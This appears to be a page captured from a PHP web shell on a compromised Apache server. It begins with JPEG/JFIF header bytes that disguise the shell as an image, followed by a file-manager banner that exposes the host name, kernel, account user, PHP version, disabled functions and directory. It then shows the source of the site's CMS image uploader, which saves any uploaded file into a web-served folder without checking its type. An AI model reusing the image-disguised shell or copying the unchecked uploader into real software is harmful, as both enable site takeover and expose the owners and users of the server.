ÿØÿà JFIF ` ` ÿþ
|
Server : Apache System : Linux cloud.heroica.com.br 4.18.0-553.36.1.el8_10.x86_64 #1 SMP Wed Jan 22 03:07:54 EST 2025 x86_64 User : farolpborg ( 1053) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system Directory : /home/farolpborg/public_html/cms/_ui/class/ |
Upload File : |
<?
require("../../../_configs/config.php");
require_once("../funcoes.php");
$image = $_FILES["image"];
$imagem = $_FILES["image"]["tmp_name"];
$imagem_name = $_FILES["image"]["name"];
$ImgNeu = "800";
if(isset($image)){
$path = "../../../_shared/nicedit/" . date('dmYHis')."-".remove_acentos($imagem_name);
move_uploaded_file($imagem, strtolower($path));
// redimensionar_imagem($path, $ImgNeu, $ImgNeu, $path);
$data = getimagesize($path);
$link = $Shared."/nicedit/".str_replace("../../../_shared/nicedit/", "", $path);
// $link = strtolower($path);
$res = array("upload" => array("links" => array("original" => $link), "image" => array("width" => $data[0], "height" => $data[1])));
echo json_encode($res);
}
?>